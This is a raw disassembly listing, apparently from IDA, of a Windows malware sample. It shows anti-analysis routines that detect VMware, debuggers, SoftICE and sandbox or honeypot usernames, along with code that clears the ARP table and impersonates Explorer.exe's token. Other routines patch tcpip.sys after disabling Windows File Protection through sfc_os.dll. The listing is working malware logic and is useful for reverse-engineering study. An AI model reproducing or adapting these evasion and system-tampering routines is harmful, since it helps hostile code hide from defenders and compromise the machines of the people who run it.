push ebx
push edi
call sub_424A20
push 0
add al, 30h
push 0Ah
push ebx
mov [esi], al
push edi
inc esi
call sub_424AA0
mov ebx, edx
mov edi, eax
or eax, ebx
jz short loc_41F604
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_41F5CB
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_41F5CB
; ---------------------------------------------------------------------------
loc_41F604: ; CODE XREF: sub_41F5B5+37�j
mov eax, [ebp+arg_8]
jmp short loc_41F60E
; ---------------------------------------------------------------------------
loc_41F609: ; CODE XREF: sub_41F5B5+5F�j
mov cl, [esi]
mov [eax], cl
inc eax
loc_41F60E: ; CODE XREF: sub_41F5B5+52�j
dec esi
lea ecx, [ebp+var_38]
cmp esi, ecx
jnb short loc_41F609
and byte ptr [eax], 0
mov eax, [ebp+arg_8]
pop edi
pop esi
pop ebx
leave
retn
sub_41F5B5 endp
; =============== S U B R O U T I N E =======================================
sub_41F621 proc near ; CODE XREF: sub_412267+4B5�p
mov ecx, dword_454218
xor eax, eax
test ecx, ecx
jz short locret_41F62F
jmp ecx
; ---------------------------------------------------------------------------
locret_41F62F: ; CODE XREF: sub_41F621+A�j
retn
sub_41F621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F630 proc near ; CODE XREF: sub_403B2C+1C58�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call dword_454390 ; GetIpNetTable
sub eax, edi
jz short loc_41F68F
sub eax, 32h
jz short loc_41F68A
sub eax, 48h
jnz short loc_41F68A
push [ebp+var_8]
call sub_422F79
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_4221F0
add esp, 10h
cmp esi, edi
jz short loc_41F68A
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call dword_454390 ; GetIpNetTable
test eax, eax
jz short loc_41F68F
loc_41F68A: ; CODE XREF: sub_41F630+28�j
; sub_41F630+2D�j ...
mov [ebp+var_4], edi
jmp short loc_41F6A5
; ---------------------------------------------------------------------------
loc_41F68F: ; CODE XREF: sub_41F630+23�j
; sub_41F630+58�j
cmp [esi], edi
jbe short loc_41F6A5
lea ebx, [esi+4]
loc_41F696: ; CODE XREF: sub_41F630+73�j
push ebx
call dword_45438C ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_41F696
loc_41F6A5: ; CODE XREF: sub_41F630+5D�j
; sub_41F630+61�j
push esi
call sub_4230B3
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41F630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F6B4 proc near ; CODE XREF: sub_41F76B+9�p
var_110C = dword ptr -110Ch
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov eax, 110Ch
call sub_4220C0
push ebx
push esi
lea eax, [ebp+var_4]
push edi
push eax
lea eax, [ebp+var_110C]
push 1000h
push eax
call dword_45430C
test eax, eax
jz short loc_41F75B
mov edi, [ebp+var_4]
push 0
shr edi, 2
pop esi
jz short loc_41F75B
loc_41F6E9: ; CODE XREF: sub_41F6B4+A5�j
lea eax, [ebp+var_10C]
push offset aUnknown ; "unknown"
push eax
call dword_42F04C ; lstrcpyA
push [ebp+esi*4+var_110C]
push 0
push 411h
call dword_42F0E4 ; OpenProcess
mov ebx, eax
test ebx, ebx
jz short loc_41F756
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 4
push eax
push ebx
call dword_4542D0
test eax, eax
jz short loc_41F756
lea eax, [ebp+var_10C]
push 104h
push eax
push [ebp+var_8]
push ebx
call dword_454224
lea eax, [ebp+var_10C]
push eax
push offset aExplorer_exe ; "Explorer.exe"
call dword_42F070 ; lstrcmpiA
test eax, eax
jz short loc_41F762
loc_41F756: ; CODE XREF: sub_41F6B4+5F�j
; sub_41F6B4+74�j
inc esi
cmp esi, edi
jb short loc_41F6E9
loc_41F75B: ; CODE XREF: sub_41F6B4+28�j
; sub_41F6B4+33�j
xor eax, eax
loc_41F75D: ; CODE XREF: sub_41F6B4+B5�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41F762: ; CODE XREF: sub_41F6B4+A0�j
mov eax, [ebp+esi*4+var_110C]
jmp short loc_41F75D
sub_41F6B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F76B proc near ; CODE XREF: sub_4130E5+C�p
; sub_416208:loc_416277�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push edi
call sub_41F6B4
test eax, eax
jz short loc_41F7BB
push eax
push 1
push 1F0FFFh
call dword_42F0E4 ; OpenProcess
mov edi, eax
test edi, edi
jz short loc_41F7BB
lea eax, [ebp+var_4]
push esi
push eax
push 0Ah
push edi
call dword_4542F8 ; OpenProcessToken
mov esi, dword_42F038
test eax, eax
jz short loc_41F7B7
push [ebp+var_4]
call dword_4543C8 ; ImpersonateLoggedOnUser
push [ebp+var_4]
call esi ; dword_42F038
loc_41F7B7: ; CODE XREF: sub_41F76B+3C�j
push edi
call esi ; dword_42F038
pop esi
loc_41F7BB: ; CODE XREF: sub_41F76B+10�j
; sub_41F76B+24�j
pop edi
leave
retn
sub_41F76B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F7BE proc near ; CODE XREF: sub_416208+18�p
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 178h
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_C], ebx
call dword_454304 ; OpenSCManagerA
mov [ebp+var_4], eax
loc_41F7DF: ; CODE XREF: sub_41F7BE+80�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_178]
push 168h
push eax
push 3
push 30h
push [ebp+var_4]
call dword_4542C8 ; EnumServicesStatusA
test eax, eax
jnz short loc_41F815
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz short loc_41F840
loc_41F815: ; CODE XREF: sub_41F7BE+48�j
xor esi, esi
cmp [ebp+var_8], ebx
jle short loc_41F83B
lea edi, [ebp+var_178]
loc_41F822: ; CODE XREF: sub_41F7BE+7B�j
push [ebp+arg_0]
push dword ptr [edi]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_41F850
inc esi
add edi, 24h
cmp esi, [ebp+var_8]
jl short loc_41F822
loc_41F83B: ; CODE XREF: sub_41F7BE+5C�j
cmp [ebp+var_C], ebx
jnz short loc_41F7DF
loc_41F840: ; CODE XREF: sub_41F7BE+55�j
push [ebp+var_4]
call dword_4541F0 ; CloseServiceHandle
xor eax, eax
loc_41F84B: ; CODE XREF: sub_41F7BE+A4�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41F850: ; CODE XREF: sub_41F7BE+72�j
lea eax, [esi+esi*8]
xor ecx, ecx
cmp [ebp+eax*4+var_16C], 4
setz cl
mov eax, ecx
jmp short loc_41F84B
sub_41F7BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F864 proc near ; CODE XREF: sub_41F8E4+1B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_41F87A
mov eax, [edi]
mov [ebp+arg_4], eax
jmp short loc_41F87E
; ---------------------------------------------------------------------------
loc_41F87A: ; CODE XREF: sub_41F864+D�j
and [ebp+arg_4], 0
loc_41F87E: ; CODE XREF: sub_41F864+14�j
mov esi, [ebp+arg_8]
test esi, esi
jz short loc_41F88C
mov eax, [esi]
mov [ebp+arg_8], eax
jmp short loc_41F890
; ---------------------------------------------------------------------------
loc_41F88C: ; CODE XREF: sub_41F864+1F�j
and [ebp+arg_8], 0
loc_41F890: ; CODE XREF: sub_41F864+26�j
push eax
push ebx
push ecx
push edx
mov eax, 564D5868h
mov ebx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edx, 5658h
in eax, dx
mov [ebp+var_4], eax
mov [ebp+arg_4], ebx
mov [ebp+arg_8], ecx
mov [ebp+var_8], edx
pop edx
pop ecx
pop ebx
pop eax
mov ecx, [ebp+arg_0]
mov eax, [ebp+var_4]
test ecx, ecx
jz short loc_41F8C1
mov [ecx], eax
loc_41F8C1: ; CODE XREF: sub_41F864+59�j
test edi, edi
jz short loc_41F8CA
mov ecx, [ebp+arg_4]
mov [edi], ecx
loc_41F8CA: ; CODE XREF: sub_41F864+5F�j
test esi, esi
jz short loc_41F8D3
mov ecx, [ebp+arg_8]
mov [esi], ecx
loc_41F8D3: ; CODE XREF: sub_41F864+68�j
mov ecx, [ebp+arg_C]
test ecx, ecx
jz short loc_41F8DF
mov edx, [ebp+var_8]
mov [ecx], edx
loc_41F8DF: ; CODE XREF: sub_41F864+74�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F864 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F8E4 proc near ; CODE XREF: .text:loc_41F91A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
mov [ebp+var_4], 0Ah
call sub_41F864
mov eax, [ebp+var_8]
add esp, 10h
sub eax, 564D5868h
neg eax
sbb eax, eax
not eax
and eax, [ebp+var_C]
leave
retn
sub_41F8E4 endp
; ---------------------------------------------------------------------------
loc_41F91A: ; DATA XREF: sub_41FB50+CA�o
call sub_41F8E4
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_41F926: ; CODE XREF: sub_41FB50:loc_41FBC6�p
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F328
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp-18h], esp
and byte ptr [ebp-19h], 0
and dword ptr [ebp-4], 0
push ebx
mov ebx, 0
mov eax, 1
; ---------------------------------------------------------------------------
db 0Fh
dd 850B073Fh, 45940FDBh, 34EB5BE7h, 89EC458Bh, 458BE045h
dd 4408BE0h, 8BDC4589h, 0C883DC4Dh, 0A48189FFh, 8B000000h
dd 898BDC4Dh, 0B8h, 8B04C183h, 8A89DC55h, 0B8h, 0E8658BC3h
dd 0FFFC4D83h, 0E745B60Fh, 64F04D8Bh, 0D89h, 5E5F0000h
; ---------------------------------------------------------------------------
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F9B7 proc near ; CODE XREF: sub_41FB50+7F�p
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F338
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_19], 1
and [ebp+var_4], 0
push edx
push ecx
push ebx
mov eax, 564D5868h
mov ebx, 0
mov ecx, 0Ah
mov edx, 5658h
in eax, dx
cmp ebx, 564D5868h
setz [ebp+var_19]
pop ebx
pop ecx
pop edx
jmp short loc_41FA17
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
and [ebp+var_19], 0
loc_41FA17: ; CODE XREF: sub_41F9B7+53�j
or [ebp+var_4], 0FFFFFFFFh
movzx eax, [ebp+var_19]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41F9B7 endp
; =============== S U B R O U T I N E =======================================
sub_41FA2E proc near ; CODE XREF: sub_41FB50:loc_41FB98�p
mov eax, large fs:30h
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
add dword ptr [eax+20h], 2000h
retn
sub_41FA2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FA42 proc near ; CODE XREF: sub_41FB50+88�p
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push esi
lea eax, [ebp+var_4]
push edi
push eax
lea eax, [ebp+var_B4]
mov esi, offset aTu4nh09smcg1hc ; "TU-4NH09SMCG1HC"
push eax
mov [ebp+var_34], esi
mov [ebp+var_30], offset aRoo ; "roo"
mov [ebp+var_2C], offset aSandbox ; "sandbox"
mov [ebp+var_28], offset aSnort ; "snort"
mov [ebp+var_24], offset aHoney ; "honey"
mov [ebp+var_20], offset aHoneyc ; "honeyc"
mov [ebp+var_1C], offset aHoneyd ; "honeyd"
mov [ebp+var_18], offset aHoneymule ; "HoneyMule"
mov [ebp+var_14], offset aVmware ; "vmware"
mov [ebp+var_10], offset aCurrentuser ; "currentuser"
mov [ebp+var_C], offset aNepenthes ; "nepenthes"
mov [ebp+var_8], offset aImail8_001531N ; "(IMail 8.00 153-1) NT-ESMTP Server X1"
mov [ebp+var_4], 80h
call dword_42F028 ; GetUserNameA
lea eax, [ebp+var_B4]
push eax
call dword_42F250 ; CharLowerA
xor edi, edi
loc_41FAC9: ; CODE XREF: sub_41FA42+A1�j
push [ebp+edi*4+var_34]
lea eax, [ebp+var_B4]
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41FB0D
inc edi
cmp edi, 0Ch
jb short loc_41FAC9
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_134]
push eax
call dword_42F120 ; GetComputerNameA
test eax, eax
jz short loc_41FB12
lea eax, [ebp+var_134]
push esi
push eax
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_41FB12
loc_41FB0D: ; CODE XREF: sub_41FA42+9B�j
xor eax, eax
inc eax
jmp short loc_41FB14
; ---------------------------------------------------------------------------
loc_41FB12: ; CODE XREF: sub_41FA42+B6�j
; sub_41FA42+C9�j
xor eax, eax
loc_41FB14: ; CODE XREF: sub_41FA42+CE�j
pop edi
pop esi
leave
retn
sub_41FA42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FB18 proc near ; CODE XREF: sub_41FB50+91�p
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 104h
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call dword_42F154 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset aInsidetm ; "\\InsideTm\\"
push eax
call sub_4235C0
neg eax
pop ecx
sbb eax, eax
pop ecx
neg eax
leave
retn
sub_41FB18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FB50 proc near ; CODE XREF: sub_4120E9+10�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
cmp dword_631270, 0
push ebx
push esi
push edi
jz short loc_41FB6A
xor eax, eax
inc eax
jmp loc_41FCBB
; ---------------------------------------------------------------------------
loc_41FB6A: ; CODE XREF: sub_41FB50+10�j
and [ebp+var_4], 0
mov esi, offset aKernel32_dll ; "KERNEL32.DLL"
push esi
call dword_42F074 ; GetModuleHandleA
test eax, eax
jnz short loc_41FB89
push esi
call dword_42F138 ; LoadLibraryA
test eax, eax
jz short loc_41FB98
loc_41FB89: ; CODE XREF: sub_41FB50+2C�j
push offset aIsdebuggerpres ; "IsDebuggerPresent"
push eax
call dword_42F13C ; GetProcAddress
mov [ebp+var_4], eax
loc_41FB98: ; CODE XREF: sub_41FB50+37�j
call sub_41FA2E
call dword_42F164 ; GetTickCount
mov [ebp+var_C], eax
mov esi, offset sub_41FCF3
mov al, [esi]
cmp al, 0CCh
jz short loc_41FBB5
xor eax, eax
jmp short loc_41FBBA
; ---------------------------------------------------------------------------
loc_41FBB5: ; CODE XREF: sub_41FB50+5F�j
mov eax, 1
loc_41FBBA: ; CODE XREF: sub_41FB50+63�j
test al, al
jz short loc_41FBC6
loc_41FBBE: ; CODE XREF: sub_41FB50+7D�j
; sub_41FB50+86�j ...
xor edi, edi
inc edi
jmp loc_41FCAF
; ---------------------------------------------------------------------------
loc_41FBC6: ; CODE XREF: sub_41FB50+6C�j
call loc_41F926
test eax, eax
jnz short loc_41FBBE
call sub_41F9B7
test eax, eax
jnz short loc_41FBBE
call sub_41FA42
test eax, eax
jnz short loc_41FBBE
call sub_41FB18
test eax, eax
jnz short loc_41FBBE
mov esi, offset loc_41FCC0
mov al, [esi]
cmp al, 0CCh
jz short loc_41FBF9
xor eax, eax
jmp short loc_41FBFE
; ---------------------------------------------------------------------------
loc_41FBF9: ; CODE XREF: sub_41FB50+A3�j
mov eax, 1
loc_41FBFE: ; CODE XREF: sub_41FB50+A7�j
test al, al
jnz short loc_41FBBE
mov esi, offset sub_41FCC3
mov al, [esi]
cmp al, 0CCh
jz short loc_41FC11
xor eax, eax
jmp short loc_41FC16
; ---------------------------------------------------------------------------
loc_41FC11: ; CODE XREF: sub_41FB50+BB�j
mov eax, 1
loc_41FC16: ; CODE XREF: sub_41FB50+BF�j
test al, al
jnz short loc_41FBBE
mov esi, offset loc_41F91A
mov al, [esi]
cmp al, 0CCh
jz short loc_41FC29
xor eax, eax
jmp short loc_41FC2E
; ---------------------------------------------------------------------------
loc_41FC29: ; CODE XREF: sub_41FB50+D3�j
mov eax, 1
loc_41FC2E: ; CODE XREF: sub_41FB50+D7�j
xor edi, edi
mov ebx, offset aSoftwareVmware ; "SOFTWARE\\VMware, Inc.\\VMware Tools"
inc edi
mov esi, 80000002h
push edi
push offset aInstallpath ; "InstallPath"
push ebx
push esi
call sub_41A57A
add esp, 10h
test eax, eax
jnz short loc_41FCAF
push 4
push offset aShowtray ; "ShowTray"
push ebx
push esi
call sub_41A57A
add esp, 10h
test eax, eax
jnz short loc_41FCAF
call sub_41FCC3
test eax, eax
jnz short loc_41FCAF
cmp [ebp+var_4], eax
jz short loc_41FC9F
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
mov esi, [ebp+var_8]
mov al, [esi]
cmp al, 0CCh
jz short loc_41FC85
xor eax, eax
jmp short loc_41FC8A
; ---------------------------------------------------------------------------
loc_41FC85: ; CODE XREF: sub_41FB50+12F�j
mov eax, 1
loc_41FC8A: ; CODE XREF: sub_41FB50+133�j
test al, al
jnz short loc_41FCAF
call [ebp+var_4]
test eax, eax
jnz short loc_41FCAF
call dword_42F124 ; IsDebuggerPresent
test eax, eax
jnz short loc_41FCAF
loc_41FC9F: ; CODE XREF: sub_41FB50+120�j
call dword_42F164 ; GetTickCount
sub eax, [ebp+var_C]
cmp eax, 1388h
jbe short loc_41FCB9
loc_41FCAF: ; CODE XREF: sub_41FB50+71�j
; sub_41FB50+FD�j ...
mov dword_631270, edi
mov eax, edi
jmp short loc_41FCBB
; ---------------------------------------------------------------------------
loc_41FCB9: ; CODE XREF: sub_41FB50+15D�j
xor eax, eax
loc_41FCBB: ; CODE XREF: sub_41FB50+15�j
; sub_41FB50+167�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41FCC0: ; DATA XREF: sub_41FB50+9A�o
xor al, al
retn
sub_41FB50 endp
; =============== S U B R O U T I N E =======================================
sub_41FCC3 proc near ; CODE XREF: sub_41FB50+114�p
; DATA XREF: sub_41FB50+B2�o
push 0
push 80h
push 3
push 0
push 3
push 0C0000000h
push offset a_Ntice ; "\\\\.\\NTICE"
call dword_42F060 ; CreateFileA
cmp eax, 0FFFFFFFFh
jz short loc_41FCF0
push eax
call dword_42F038 ; CloseHandle
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41FCF0: ; CODE XREF: sub_41FCC3+20�j
xor eax, eax
retn
sub_41FCC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FCF3 proc near ; DATA XREF: sub_41FB50+56�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
mov al, [esi]
cmp al, 0CCh
jz short loc_41FD04
xor eax, eax
jmp short loc_41FD09
; ---------------------------------------------------------------------------
loc_41FD04: ; CODE XREF: sub_41FCF3+B�j
mov eax, 1
loc_41FD09: ; CODE XREF: sub_41FCF3+F�j
pop esi
pop ebp
retn
sub_41FCF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FD0C proc near ; CODE XREF: sub_41FE93+70�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+var_4]
push edi
push eax
push [ebp+arg_0]
call sub_42EBEC
mov esi, eax
test esi, esi
jz loc_41FDB0
push esi
call sub_422F79
mov edi, eax
pop ecx
test edi, edi
jz short loc_41FDB0
push edi
push esi
push [ebp+var_4]
push [ebp+arg_0]
call sub_42EBE6
test eax, eax
jz short loc_41FD8A
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
push offset asc_43E8EC ; "\\"
push edi
call sub_42EBE0
test eax, eax
jz short loc_41FDA9
mov eax, [ebp+var_8]
cmp word ptr [eax+0Eh], 0A28h
jnz short loc_41FDA9
movzx eax, word ptr [eax+0Ch]
cmp eax, 884h
jz short loc_41FDA4
cmp eax, 9C9h
jz short loc_41FDA0
cmp eax, 0A7Dh
jz short loc_41FD9C
cmp eax, 0B4Ch
jz short loc_41FD97
loc_41FD8A: ; CODE XREF: sub_41FD0C+3A�j
xor esi, esi
loc_41FD8C: ; CODE XREF: sub_41FD0C+8E�j
; sub_41FD0C+9B�j
push edi
call sub_4230B3
pop ecx
mov eax, esi
jmp short loc_41FDB2
; ---------------------------------------------------------------------------
loc_41FD97: ; CODE XREF: sub_41FD0C+7C�j
push 2
loc_41FD99: ; CODE XREF: sub_41FD0C+92�j
; sub_41FD0C+96�j
pop esi
jmp short loc_41FD8C
; ---------------------------------------------------------------------------
loc_41FD9C: ; CODE XREF: sub_41FD0C+75�j
push 4
jmp short loc_41FD99
; ---------------------------------------------------------------------------
loc_41FDA0: ; CODE XREF: sub_41FD0C+6E�j
push 3
jmp short loc_41FD99
; ---------------------------------------------------------------------------
loc_41FDA4: ; CODE XREF: sub_41FD0C+67�j
xor esi, esi
inc esi
jmp short loc_41FD8C
; ---------------------------------------------------------------------------
loc_41FDA9: ; CODE XREF: sub_41FD0C+51�j
; sub_41FD0C+5C�j
push edi
call sub_4230B3
pop ecx
loc_41FDB0: ; CODE XREF: sub_41FD0C+18�j
; sub_41FD0C+29�j
xor eax, eax
loc_41FDB2: ; CODE XREF: sub_41FD0C+89�j
pop edi
pop esi
leave
retn
sub_41FD0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FDB6 proc near ; CODE XREF: sub_41FE93+38�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call dword_42F044 ; GetVersionExA
cmp [ebp+var_90], 5
jnz short loc_41FE01
cmp [ebp+var_8C], 1
jnz short loc_41FE01
lea eax, [ebp+var_80]
push offset a2_0 ; "2"
push eax
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41FE01
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_41FE01: ; CODE XREF: sub_41FDB6+27�j
; sub_41FDB6+30�j ...
push [ebp+arg_0]
call sub_41C059
pop ecx
push 0
call dword_42F150 ; ExitThread
sub_41FDB6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FE12 proc near ; CODE XREF: sub_41FE93+BD�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push offset aS_book ; "%s.book"
push eax
call sub_422063
add esp, 0Ch
lea eax, [ebp+var_104]
push 0
push eax
push [ebp+arg_0]
call dword_42F09C ; CopyFileA
neg eax
sbb eax, eax
neg eax
leave
retn
sub_41FE12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FE4C proc near ; CODE XREF: sub_41FE93+165�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+var_200]
push 100h
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call dword_42F098 ; MultiByteToWideChar
push offset aSfc_os_dll ; "sfc_os.dll"
call dword_42F138 ; LoadLibraryA
push 5
push eax
call dword_42F13C ; GetProcAddress
lea ecx, [ebp+var_200]
push 0FFFFFFFFh
push ecx
push 0
call eax
leave
retn
sub_41FE4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FE93 proc near ; DATA XREF: sub_403B2C+1168�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_240 = byte ptr -240h
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_B8 = dword ptr -0B8h
var_AC = dword ptr -0ACh
var_A4 = byte ptr -0A4h
var_9C = byte ptr -9Ch
var_94 = byte ptr -94h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_4220C0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 26h
mov esi, eax
pop ecx
lea edi, [ebp+var_13C]
rep movsd
mov ebx, [ebp+var_13C]
push [ebp+var_B8]
xor esi, esi
mov [ebp+var_38], ebx
inc esi
mov [eax+94h], esi
call sub_41FDB6
lea eax, [ebp+var_344]
mov [esp+10h+var_10], 104h
push eax
call dword_42F110 ; GetSystemDirectoryA
lea eax, [ebp+var_344]
push eax
lea eax, [ebp+var_240]
push offset aSDriversTcpip_ ; "%s\\drivers\\tcpip.sys"
push eax
call sub_422063
lea eax, [ebp+var_240]
push eax
call sub_41FD0C
xor edi, edi
add esp, 10h
cmp eax, edi
mov [ebp+var_14], eax
jnz short loc_41FF49
cmp [ebp+var_AC], edi
jz short loc_41FF36
push offset a68gmpWcesMnsrm ; "68gmp/wceS//Mnsrm1FhS.k."
lea eax, [ebp+var_138]
push offset aSTcpip_sysVers ; "%s TCPIP.SYS version is wrong."
push eax
push ebx
call sub_4104F6
add esp, 10h
loc_41FF36: ; CODE XREF: sub_41FE93+87�j
push [ebp+var_B8]
call sub_41C059
pop ecx
push edi
call dword_42F150 ; ExitThread
loc_41FF49: ; CODE XREF: sub_41FE93+7F�j
lea eax, [ebp+var_240]
push eax
call sub_41FE12
mov eax, offset word_44D6A0
mov edx, offset dword_449008
mov [ebp+var_60], eax
mov [ebp+var_54], eax
mov [ebp+var_50], eax
mov [ebp+var_80], eax
mov [ebp+var_74], eax
mov [ebp+var_70], eax
mov ecx, offset dword_449004
mov eax, offset dword_449000
push esi
mov [ebp+var_6C], offset asc_433E90 ; "L"
mov [ebp+var_68], offset dword_448FFC
mov [ebp+var_64], offset dword_448FF8
mov [ebp+var_5C], edx
mov [ebp+var_58], ecx
mov [ebp+var_8C], offset aC ; "C"
mov [ebp+var_88], offset dword_448FF4
mov [ebp+var_84], offset dword_448FF0
mov [ebp+var_7C], edx
mov [ebp+var_78], ecx
mov [ebp+var_40], offset dword_448FEC
mov [ebp+var_3C], eax
mov [ebp+var_4C], offset dword_448FE8
mov [ebp+var_48], offset aG ; "G"
mov [ebp+var_44], eax
mov [ebp+var_8], edi
call sub_422F79
pop ecx
mov [ebp+var_C], eax
pop ecx
mov [ebp+var_10], edi
push 7530h
